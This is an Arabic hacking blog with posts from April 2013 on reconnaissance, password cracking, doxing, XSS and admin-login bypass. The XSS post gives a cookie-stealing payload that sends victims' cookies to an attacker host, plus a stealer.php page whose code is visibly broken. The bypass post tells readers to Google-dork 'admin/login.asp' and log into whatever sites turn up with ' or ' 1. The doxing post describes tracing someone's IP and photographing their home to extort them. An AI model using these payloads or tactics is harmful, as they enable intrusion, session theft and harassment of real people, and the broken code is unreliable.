الثلاثاء، 30 أبريل 2013

مقال: تعرف على أولى أدوات مرحلة الاستطلاع: HTTRACK

كما ذكرنا مِن قبل فعملية الاستطلاع هي الأقل تقنية، ولكن مع ذلك فهناك أدوات نستخدمها لتساعدنا في هذه المرحلة ولكن الاعتماد الأكبر لا يكون على الأدوات بالطبع!!
عادةً ما نبدأ خطوتنا الأولى بالتدقيق في الموقع الإلكتروني للهدف. في بعض الأحيان، قد نستخدم أداة أسمها HTTrack لنصنع نسخة مطابقة للموقع. HTTrack أداة مجانية تقوم بصنع نسخة مطابقة للموقع و لكنها تكون موجودة على حاسوبك. هذه النسخة ستحتوي على كل الصفحات الموجودة في الموقع، الروابط، الصور، نسخة مطابقة تمامًا لموقع الهدف.
من المهم أن تعرف أنكَ كلما قضيت وقتًا في التنقل و استعراض الموقع المستهدف، كلما زادت المخاطرة بتتبع أثارك حتى و إن كنت تتصفح الموقع بشكل عادي. تذكر أنكَ في كل مرة تتصل مباشرةً بالهدف، فهناك احتمال أن تترك خلفك أثار يسهل تتبعك من خلالها.
يمكنك تحميل برنامج HTTrack مباشرة من موقعهم الرسمي :http://www.httrack.com/ من أجل تثبيت البرنامج على الويندوز فهو أمر لا يحتاج الكثير من الجهد، فبمجرد تحميل الملف التنفيذي exe و تشغيله سيبدأ التثبيت المعتاد كأي برنامج آخر. إن أردت تثبيت HTTrack على الـ”باك تراك” فيمكنك ذلك عن طريق كتابة الأمر :
apt-get install httrack
الفائدة من هذه الأداة أنها ستمكنك من تصفح نسخة مطابقة من الموقع المستهدف بدون الحاجة إلى الاتصال بالموقع الأساسي، و هذا سيقلل من مخاطرة تركك لآثار قد تؤدي إلى الوصول إليك أثناء تصفحك للموقع الأساسي.
يجب أن نذكر أن ما قمنا بتثبيته الآن هو النسخة التي تعمل عن طريق سطر الأوامر، أما النسخة ذات الواجهة الرسومية فأنا لا أحبذها صراحة، ليس لضعفها ولكني أفضل النسخة التي تعمل عن طريق سطر الأوامر.
لتشغيل الأداة يكفي أن تكتب في سطر الأوامر:
 1
بمجرد كتابتك لهذا الأمر، سيبدأ عمل الأداة  كما في الصورة:
 2
فلنشرح الأوامر الظاهرة في الصورة:
mkdir websites: لصنع مجلد جديد اسمه websites ليحتوي على ملفات الموقع المراد نسخه.
cd websites: للدخول إلى هذا المجلد.
httrack: لاستدعاء الأداة أو لتشغيل الأداة.
Enter Project Name: يسألنا عن اسم للعملية وقد استخدمنا اسم isecur1ty.
Base path: هذا هو المسار الذي سيتم حفظ ملفات الموقع الذي سنقوم بنسخه.
Enter URLs: رابط الموقع المراد صنع نسخة مطابقة منه.
Action: خيارات صنع النسخة، أنا أفضل الخيار الثاني، فهو يعطيك خيارات إضافة كالتالي:
1-  Proxy: يسألك إن كنت تريد استخدام proxy أثناء الاتصال.
2-  You can define wildcards: يسألك إن كنت تريد تحديد نوع محدد من الملفات لتحميله.
3-  Additional options: يسألك عن خيارات إضافية، يمكنك التوصل إليها عن طريق كتابة help في هذه الخانة.
بالطبع الوقت الذي سيستغرقه تحميل الموقع يعتمد بشكل كامل على حجم الموقع المستهدف، بعد أن تنتهي الأداة من تحميل الموقع، ستحولك إلى صفحة يمكنك من خلالها تصفح الموقع المطابق وستتمكن من التجول فيه بكل سهولة، و يمكنك أن تدخل لهذه الصفحة أيضًا من خلال الانتقال للمكان الذي قمت بحفظ الموقع فيه.
 3
سواء قمت بصنع نسخة مطابقة للموقع على حاسوبك أو كنت ستتصفح الموقع بشكل طبيعي على الإنترنت فيجب أن تنتبه إلى التفاصيل. يجب أن تبدأ بتسجيل كل المعلومات التي تجدها على موقع الهدف. عادةً، ببعض البحث العميق ستصل إلى معلومات مهمة ستفيدك كثيرًا، الإيميلات الخاصة بالموقع أو الإيميلات الخاصة بصاحب الموقع، عنوان الشركة، رقم الهاتف، رقم الفاكس، الكثير من المعلومات.
خلال هذه العملية يجب أن تنتبه للتصريحات والتحديثات التي تعلنها الشركة من خلال موقعهم، فمثلًا: إن كانوا قد اعلنوا عن دمج شركتهم مع شركة أخرى فهذه يعطيك قائمة بأهداف محتملة قد توصلك إلى النظام الرئيسي، يجب أيضًا أن تنتبه إلى طلبات الوظائف التي تعلن عنها الشركة، فعندما تطلب شركة ما قدرات معينة في الشخص الذي تريده سيمكنك هذا من معرفة التكنولوجيا المستخدمة في الشركة، مثلًا: إن طلبت الشركة شخص يستطيع العمل على نظام لينكس و ويندوز، فهذا يعني أنهم يستخدمون هذه الأنظمة في شركتهم، كل هذه المعلومات مهمة. وهناك أمثلة حية على ذلك ففي كثير من الأحيان تجد المواقع والمنتديات تنشر تحديثاتها التقنية، مثلاً تجد موقع يُعلِن عن تحديثه لنسخة اسكربت الصور، أو مثلاً تحديث نسخة المنتدى إلى النسخة كذا!! هل يمكنك تخيُل مقدار المعلومات التي يمكنك الحصول عليها بدون أي جهد!!
عادةً، عندما ننتهي من هذه العملية، ستكون لدينا معلومات عن مَنْ هم، و ماذا يفعلون، و أين عنوان شركتهم الفعلي؟
عندما ننتهي من هذه العملية ستكون لدينا فكرة عن طبيعة الشركة و عملها، و يمكننا الآن أن ننتقل إلى عملية الاستطلاع السلبي. عندما تبدأ عملية الاستطلاع السلبي فمن المستحيل أن تتمكن الشركة من تحديد تحركاتنا وذلك لأن هذه العملية لا تتطلب إرسال حزمة واحدة إلى الهدف. سلاحنا الأساسي لأداء هذه المهمة هو الإنترنت. يجب أن نبدأ هذه العملية بعمل بحث كثيف عن الهدف في عدة محركات بحث.
يوجد العديد من محركات البحث في وقتنا الحالي، و أهمهم و أشهرهم جوجل بالطبع، لا يوجد أحد في العالم لا يعرف جوجل.
ما أخبرنا به Johnny Long في كتابه “Google Hacking For Penetration Tester” قد غير عالم اختبار الاختراق تمامًا. عادةً، عندما تسأل شخص ما عن كيف تستخدم جوجل فجوابه يكون ثابت “قم بفتح المتصفح، ثم اكتب جوجل، ثم ابحث عن أي شيء تريده”، لكن ما ورد في كتاب Johnny Long قد غير طريقة تفكيرنا تمامًا.

الاثنين، 29 أبريل 2013

إخترق إي جهاز في العالم و غير باسورد Admin

إخترق إي جهاز في العالم و غير باسورد Admin


بسم الله الرحمان الرحيم

إخواني أعضاء و مشرفي منضمة الهكر العربي


إليكم أسطوانة Windows Admin Hack



فهي أسطوانة تساوي الملايين لكسر باسوورد أي جهاز في العالم
حجم الأسطوانة فقط4Mo بعد فك الضغط

الأسطوانة عبارة عن ملف ISO يجب حرقها علي CD قبل إستعمالها




التحميل
http://pogostick.net/~pnh/ntpasswd/cd100627.zip

هيـــه؟ حمل و اهرب؟ على الأقل رد واحد

___________________________________________________
Anonymous arabe

السبت، 27 أبريل 2013

كيف تصبح هاكر محترف

 كيف تصبح هاكر محترف  انا اضمن لك احتراف الهاكر يعني هاذا هوالباب الاول الذي دخلت منه الى الهاكر

كورس CEH v7 الهاكر الاخلاقي







السلام عليكم ورحمة الله وبركاته ................."قرصان أبيض القبعة" هو المصطلح الاوضح و يطلق على المخترق الذي يملك جميع المعلومات والدراسات التي تجعله هكر أخلاقي.



يساعد الشركات في استعادة مواقعها ودراسة كيفية تمكن المخترق " قبعة سوداء " من السيطرة على السيرفر وبذلك يقوم فوراً بتوفير الحماية اللازمة من تلك الطرق والأساليب والثغرات المستخدمة من قبلهم .


يبدأ المهندس مؤمن هانى في شرح كورس CEH الذي يؤهلك للحصول علي شهادة CEH version6 &7 يمكنكم متابعة الشرح
1-CEH Introduction

2-Introducation to Ethical Hacker
3- Footprinting 4-Scanning Networks 5-DNS Spoofing 6-Phishing 7-Trojon & Backdoors 8-Viruses and Worms 9-Encryption 10-Certified Ethical Hacker - CEH (DDOS Attack) By Eng-Momen Hany 11-Certified Ethical Hacker - CEH (System Hacking) By Eng-Momen Hany 12-Certified Ethical Hacker - CEH (Hacking Wireless) By Eng-Momen Hany

نصائح لحماية حاسوبك من الاختراق

حاسوبك هو ملكيتك المعلوماتية التي تتضمن كل ما يخصك من صور و من معلومات و اسرار لكن هل فكرت يوما انه التجسس عليك ممكن نعم يمكن لاي شخص التجسس على ملكيتك و تخريبها و سرق محتوايتها لهذا في هذه التدوينة قررت ان اعطيك نصائح من اجل الحفاظ على حاسوبك و حمايته من الاختراق .
تحميل برامج مضادة الفيروسات : فهذه البرامج تلعب دورا هاما في جهازك في حمايته و ذلك بكشف الفيروسات و تحذفها من الجهاز و و هي برامج ضرورية للحفاظ على جهازك من الاختراق 
تجنب الروابط الملغمة : فبعض الاشخاص يقومون بارسال روابط ملغمة  الينا على اساس التجسس و سرقة المفات و حسابتنا الشخصية على الانترنيت 
تجنب الملفات ذات الامتددات المتعددة مثل:filename.bmp.***) أو (filename.txt.vbs). فهذه الملفات مملوءة بالتروجونات

اغلق كل البورتات المفتوحة في جهازك : فاذا وجد بورت مفتوح في جهازك فاعلم انه سيتم التجسس عليك من قبل الهاكر 



الجمعة، 26 أبريل 2013

مقال: ماهو Doxing وكيف تجنبه

مقال: ماهو Doxing وكيف تجنبه

موضوعنا اليوم سيكون حول مفهوم Doxing سنقوم بمعرفة معناه والتقتنيات والأدوات المستعملة به وأيضا كيف نقوم بالحماية منه.Detective_cut_out_clip
جلنا يعلم أن لكل شخص عدو أو ربما أعداء سواء كان هدا الشخص مشهورا عالميا أو تصفية حساب أو كان الشخص مجرد  مستهدف من قبل هاكر غير أخلاقي إدا يقوم المهاجم بجمع معلومات للكشف عن ضحيته والوصول إلى هدفه من هنا جاء مفهوم Doxing خصوصا عند الهاكر فهدا العالم يستوجب على الهاكر إخفاء نفسه ولا يترك أي أثر يكشف عن هويته مثلا نجد مشاكل بين هاكر وأخر ويقوم أحد منهم يكشف عن هوية الشخص فأنت بعالم الأنترنت تتعرف على الشخص فقط من الإسم المستعار الدي يطلق على نفسه وتتعامل معه من خلال الأنترنت ومن خلال إسمه المستعار فحين الكشف عليه ووضع كل مايخصه للناس يصبح هدا الشخص مستهدفا من قبل شرطة الأنترنت وهنا نتحدث فقط عن الهاكر الدين يقومون بعمليات إختراق الغير أخلاقية ليس مثل أطفال الهاكر من يجدون ثغرات جاهزة ويستخدمونها .
بطبيعة الحال يمكن إستخدام Dowing في إختبار إختراق أخلاقي والإستفادة منه وكدلك يستخدم في عمل تخريبي حيث أن رئيس أمريكا أوباما قد تم إستهدافه ب Doxing ومعرفة المواقع التي يزورها ومعرفة اسم الحساب الشخصي الخاص به وكذلك معرفة رقم الهاتف الشخصي الخاص به وهذا يثبت لنا فقط بأن Doxing يبقى أمرا خطيرا لدرجة كبيرة ويصعب الحماية منه.
تبقى طريقة توفرك على المعلومات الشخصية لهدفك مختلفة عند كل شخص فهنالك من سيقوم باستخدام محركات البحث مثلا ك Bing & Google & Yahoo الشهيرة والمعرفة وكذلك هناك من سيقوم بإستخدام برامج مثل Maltego وهنالك أيضا مواقع تساعدك بهذه العملية حسب بلد الشخص المستهدف وهذه المواقع تسمى الصفحات الصفراء تقوم “Yellow page” حيث تقوم بكتابة إسم الضحية يعطيك العنوان ورقم الهاتف والعكس صحيح وتبقى هذه لمواقع خطيرة جدا حيث تكشف عن معلومات جد حساسة كذلك مثلا هدفك يتواجد ببلد غير بلدك لنقل مثلا بالمغرب فأنت ستقوم بالدخول إلى  موقع Yellow page الخاص بالهدف وتقوم بكتابة إسمه أو رقم هاتفه أو تقوم وتجد النتيجة أمامك .
هنالك أيضا طرق كثيرة تستخدم في Doxing فعند إمتلاكك لبريده الشخصي تقوم بمراسلته برسالة وعند رده عليك ستقوم بمعرفة IP الخاص به وهذا الأخير سيمكنك من معرفة مزود الخدمة الخاص به مكان إقامته ويمكنك أيضا أخد صور لمكان إقامته وإستفزازه بها وطلب المقابل لذلك لو كان هناك حساب ما “لا أشجع على تطبيق هده الطريقة”.
إذا هدا مايسمى Doxing تتبع أثار الأشخاص والتوفر على معلوماتهم الحساسة يبقى أمرا جد خطير فالنصيحة تكمن في عدم كتابة أي معلومات قد تنفع غيرك بإستخدامها ضدك خصوصا بالمواقع الإجتماعية تجنب عدم قبول صداقات أشخاص لا تعرفهم أو إعطاء معلومات لأي شخص مهما كان إستخدم برامج التشفير برسائلك وتجنب التسجيل بالمواقع المشبوهة والتي تقوم ببيع قاعدات البيانات الخاصة بها مقابل مبلغ مادي وهدا سيؤدي إلى معرفة الأرقام السرية للمسجلين بالموقع إذا يبقى الأمر عليك في طريقة إستخدامك ل موضوع Doxing أتمنى عدم تجربته على الأشخاص بطرق غير قانونية فنحن لا نشجع على دلك.

الاثنين، 22 أبريل 2013

اختراق المواقع بثغرة XSS

اختراق المواقع بثغرة XSS

ما هي ثغرات XSS في المواقع و كيفية الإستفادة منها لاختراق المواقع ؟
 ان المواقع المصابة بثغرات ال XSS هي المواقع التي تستطيع التعديل على محتوى مصدرها و ادخال كود javascript أو HTML او PHP
 ما يجب ان تعرفه HTML,javascript,PHP

 اي ان ثغرة XSS تعني امكانية تعديل محتويات الموقع.....
 و معظم هذه الثغرات موجودة في مربعات البحث في المواقع ...
 مثلا عنوان صفحة بحث في الموقع او في مربعات الكومنز او الرسائل او مربعات ادخال النصوص.
www.facebook.com/search.php?q=word
 يكون الموقع قد كتب في صفح البحث جملة "نتائج البحث ل word : ".
 و لكن ماذا اذا أدخلنا سكريبت جافا سكريبت في مربع البحث؟
http://www.facebook.com/search.php?q=<script>alert("XSS")</script>word
 ستكتب صفحة البحث "نتائج البحث ل <script>alert("XSS")</script>word : "
 هنا ادرجنا السكريبت في الصفحة و سوف يظهر مربع تنبيه في الصفحة XSS
 هذا يعني ان الموقع مصاب بثغرة XSS
لماذا يكون الموقع مصابا بها ؟
 لأن مبرمجي الموقع كسولين جدا ليفلترو كلمة البحث من الرموز المميزة مثل #@$%^,.<>
 ليمنعو من إدخال كود javascript او HTML
هناك نوعين من ثغرات الXSS
 

النوع الدائم :
 يكون هذا النوع غالبا في مربعات الكومنتز و التعليقات .
 حيث في مربع التعليق على موقع ما ندخل مثلا كود جافا سكريبت .
 <script>alert("XSS")</script>
 و سوف يحفظ التعليق في الصفحة أي سنحفظ كود الجافا سكريبت بشكل دائم بالصفحة
 

النوع المؤقت :
 يكون النوع المؤقت غالبا في صفحات البحث حيث لا نستطيع ادراج الكود بشكل دائم و لكن نستطيع إدراجه فقط عن طريق رابط البحث مثل المثال السابق
http://www.infectedsite.com/search.php?q=<script>alert("XSS")</script>word
ما الفائدة من ثغرات XSS و كيف نستطيع اختراق الموقع عن طريقها ؟
 

هناك الكثير من الطرق لإختراق الموقع عن طريق ثغرات XSS
 أهمها سرقة الكوكيز
 تحتاج الى استضافة موقع تدعم PHP
 ننشئ صفحة PHP مثال stealer.php
 تقوم هذه الصفحة بكتابة الكلمات التي تردها بطريقة GET
 الكود :
 <?php
 $data=$_GET["c"]
 $f=open("cookies.tct","w")
 $f.write($data)
 $f.close()
 ?>
 

هذه الصفحة سوف تكتب البيانات التي تردها الى ملف cookies.txt و البيانات التي سنعطيها اياها هي الكوكيز عن طريق ادخال كود جافا سكريبت عن طريق الثغرة مثال في الثغرات المؤقتة في طريقة البحث :
http://www.infectedsite.com/search.php?q=<script>document.location("http://ypursite.com/stealer.php?c="+document.cookie);</script>
 هنا دمجنا السكريبت
 <script>document.location("http://yoursite.com/stealer.php?c="+document.location)</script>
 هذا الكود سيحول الضية الى موقعك و يعطي الصفحة التي ستكتب الكووكيز قيمو الكوكيز عن طريق الأمر
 document.cookie
 هنا اذا فتحنا الملف
http://yoursite.com/cookies.txt
 ستجد الككيز للمستخدم مكتوبة فيها
 

 اما في الثغرات الدائمة فيكفي ادخال الكود
 <script>document.location("http://yoursite.com/stealer.php?c="+document.location)</script>
 ليسرق الكوكيز
 

و أيضا في الثغرات الدائمة نستطيع ان نحول متصفح الموقع المصاب بالثغرة XSS
  عن طريق سكريبت

كيفية إختراق المواقع المصابة بثغرة bypass

كيفية إختراق المواقع المصابة بثغرة bypass



كيفية إختراق المواقع المصابة بثغرة bypass

اولا ضع هذا "الدورك" (admin/login.asp) في محرك البحث google ثم نضغط entre

سوف تظهر لنا الكثير من المواقع المصابة بهذه الثغرة

نختار منها موقع ونفتحه فتظهر لنا لوحة التحكم لادمين الموقع وبها خانتان

الخانة الاولى نضع بها اسم المستحدم حيث نكتب كلمة admin

الخانة الثانية نضع بها كلمة المرور حيث نكتب هذا الكود ' or ' 1

شاهد الفديو  

تحميل نظامanonymous os

تحميل نظامanonymous os

 ساشرح اليوم طريقة تحميل نظامanonymous os الخاص بمجموعة المجهولين (Anonymous) التي قامت بإطلاق توزيعة لينكس خاصة بهم تحمل إسم Anonymous OS وهي في الأصل نسخة معدلة من لينكس 11.10 تستخدم بيئة Mate لسطح المكتب وتحتوي على العديد من الأدوات التس تساعدك على إختبار المواقع وأمنها وأصحاب التوزيعة يقولون أن الغرض من هذه النسخة تعليمي بحت وهم لايشجعون على إختراق المواقع ويحملون المستخدم نفسه مسؤولية أي شيء يحدث عن إستخدام هذه التوزيعة.

عند التحميل انصح ب اسخدامه على نظام و همي لتجنب اي مشاكل  ( VMware Workstation )
رابط التحميل     thepiratebay

الاثنين، 15 أبريل 2013

تعلم التشفير بكل انواعه

http://www.youtube.com/user/woOokr هاذا قنات احد اصدقائي بها كل مايخص عالم التشفير

الخميس، 11 أبريل 2013

الاثنين، 8 أبريل 2013

اقوى دورة اختراق الاجهزة

اهلا بكل متتبعينا على الفايسبوك اليوم اول درس لدورة احتراف اختراق الاجهزة
اترككم مع مسر كريزي
لــتــفــاصــيــل الــتــحــمــيــل اضــغــطـ ((( هـــــنـــــا ))) ----------------------------------------­----------------------------------------­-------------- دورة مستر كريزي لاحتراف اختراق الاجهزة والتشفير والحماية لـ المبتدئين شاملة لـ جميع البرامج والأدوات والروابط المستخدمة - من الصفر إلى الاحتراف cr3zy mr.cr3zy crazy mr.crazy crezy mr.crezy ----------------------------------------­----------------------------------------­-------------- الطريقة الأولى لـ التحميل : من خلال موقع الـ ميديا فاير - اضغط على هـ الرابط http://www.mediafire.com/?byl7350aoem0v 1 - اختر طريقة التحميل التي تناسبك - أحادية أو خماسية 2 - اضغط على كلمة Download المجاورة لـ البارت الذي تريد تحميله 3 - انتظر لحظات حتى يتم تنشيط الرابط 4 - اضغط على كلمة Click Here To Start Download ----------------------------------------­----------------------------------------­-------------- الطريقة الثانية لـ التحميل : من خلال موقع الـ فور شيرد - اضغط على هـ الرابط http://mrcr3zy.4shared.com 1 - اختر طريقة التحميل التي تناسبك - أحادية أو خماسية 2 - اضغط على سهم التحميل الأخضر المجاور لـ البارت الذي تريد تحميله 3 - اضغط على كلمة Download Now 4 - انتظر العد التنازلي 5 - اضغط على كلمة Download File Now

الخميس، 4 أبريل 2013

مقال : الهاتف النقال حمايته ومراقبته

مما لا شك فيه فإن كل جهاز إلكتروني متصل بالشبكة فهو مراقب من جهات مختصة كذلك الأمر ينطبق على هاتفك النقال فكم من شخص تسبب له هذا الهاتف بالسجن أو بتسريب معلومات خطيرة أفادت بشكل كبير الطرف الأخر وأصبح الهاتف النقال في حياتنا اليومية شبه مستلزم عند كل فئات الناس من صغرهم إلى كبرهم هذا ماجعله يصبح أداة للتنصت على مكالماتنا أو حتى رسائلنا والإطلاع على الرسائل المخزنة وكذلك الوصول إلى كافة المعلومات المخزنة به في هذه التدوينة سوف نتطرق إلى كيف يتم إختراق الهاتف النقال وكيف يتم الحصول على المعلومات وماهي الطرق التي يتوجب علينا عملها لتجنب وقوعنا بالمشاكل.؟
مما لا يخفى علينا فإن جهاز الهاتف يكون مراقب من حيث المكالمات التي تصله أو المكالمات التي يعملها وكذلك الرسائل المرسلة والواردة فكل هذه الأشياء يتم تخزينها من طرف شركات الإتصالات أو الإستخبارات كذلك عندما يكون الشخص مستهدف وسوف نتطرق إلى كيفية حدوث ذلك ببقية الموضوع.
sdfs
كلنا يعرف بأن الهاتف يكون مرتبط بشبكة يمر من خلال خطوط شركة الإتصالات وهاته الشركة قد تكون خاضعة لجهات كبيرة أو قد يكون هنالك صفقة سرية فيما بينهم بحيث تقوم بإعطاء التسجيلات لهاته الجهة ويتم حفظها لمدة لاتقل عن 6 أشهر وبعدها يتم حذف جميع البيانات من الشركة وهذا مايشكل خطرا على المستخدم فعندما يتم تسجيل أي شيء يخص بهاتفك فإنه قد يستخدم ضدك عند الحاجة إليه وقد يخضعك إلى عقوبات في حقك وقد تكون قاسية .
كيف تتم عملية المراقبة؟
تتم عملية المراقبة لأجهزة الهاتف الأرضية أو المحمولة بطريقة عادية حيث يتم ذلك عن طريق شركات الإتصال أو عبر الجهات الحكومية والإستخبارات وقد يتم التنصت عليك دون الحاجة منهم إلى أي أدات أو جهد كبير وكما حدث في الثورة المصرية فعندما يقع أحد يقبضة أجهزة الأمن يكون سهلا بأيديهم أن يتنصتو عليه ومعرفة رسائله كيف ذلك ؟
تعرض المتظاهرون في ثورة مصر للإعتقال سواء كان بسبب أو من غير وبعد إلقاء القبض عليهم يكونو كطعم لأجهزة المخابرات حيث يتم إستخدام أو زرع شريحة صغيرة إسمها Proxy Sim card لشريحة الهاتف بحيث يتم زرعها من خلال جهاز معين هذه الشريحة التي يتم زرعها تسمح لهم بنسخ جميع البيانات التي يتم تسجيلها بداخل الشريحة الرئيسية للجوال من سجلات الأسماء والإتصالات والرسائل , عندما يتم القبض على الشخص يتم أخد كل مابحوزته من جوال و أوراق إلخ ويتم بغرفة ثانية التلاعب بشريحة الهاتف بدون علم منه فيقومون بزرع تلك الشريحة كما قلنا وعند إطلاق سراحه الشخص لا يدري بأنه أصبح طعما ومستهدفا فعند خروجه من مكتب التحقيق يقوم بعمل إتصالات وإرسال رسائل لأشخاص غيره فيقوم هو من دون شعور منه بمساعدة المخابرات الأمنية بالقبض على كل من معه هكذا تم القبض على العديد منهم وإستجوابهم في الثورة المصرية
كما أن المسؤولون بشركة الإتصالات بدولة عربية لاداعي لذكر إسمها تعرض مسؤولوها لإختراق والتجسس عليهم وكانت هذه العملية جد خطيرة فقد قام الكيان الصهيوني بالتنصت على شخصيات كبيرة بهذه الشركة وكان من ضمنهم مهدنسين ومسئولين : رئيس مجلس الإدارة – ومدير إدارة تصميم الشبكات وغيرهم الكثير والكثير من المناصب الحساسة فقد قام الكيان الصهيوني بإرسال طعهم وهما شخصان لهذه الشركة وقاما بزرع أجهزة المناسبة لخدمة الكيان الصهيونو داخل شبكة الشركة المستهدفة ولاداعي للدخول في التفاصيل .
طرق الحماية ؟
  1.      لحمايتنا من المتاعب والمشاكل يجب علينا معرفة بأن حمايتك الشخصية من المتاعب تكمن من خلالك أي بمعنى
  2.      الإبتعاد قدر الإمكان عن المشاكل التي قد تجعلك محل مراقبة لجهات معينة سواء حكومية وأمنية
  3. ولو قدر الله ووقعت بالمشاكل يجب عليك معرفة شيء أحسن شيء تقوم به بعد إطلاق سراحك وهو تغير شريحتك وهاتفك والبدأ من جديد فقد تكون طعما كما قلنا
  4. ضبط السان والكلمات عند إستخدامك للهاتف الأرضي أو المحمول بحيث تتكلم بطريقة يفهما الشخص الذي تكلمه قد تكون برموز أو ماشابه
  5.     وطرق الحماية كما قلت تبقى عليك أيها المستخدم والحيطة والحذر من الواجبات الأساسية عليك
الهواتف الأرضية أو المحمولة يمكن أن تكون بمتابة الوسيلة التي تسهل علينا أمورنا اليومية ومن بين أكثر الوسائل إستخداما في حياتنا الشخصية فقد تكون عدد المكالمات والرسائل في اليوم بنسبة لاتتخيل أي بملايير الارقام في العالم هذا ماجعلها مستهدفة عند البعض فالحيطة والحذر هي من أولى السمات التي يجب علينا معرفتها .

Twitter Delicious Facebook Digg Stumbleupon Favorites More

 

تعريب وتطوير: www.tempblogge.blogspot.com
Design by Free WordPress Themes | Bloggerized by Lasantha - Premium Blogger Themes | Facebook Themes custom blogger templates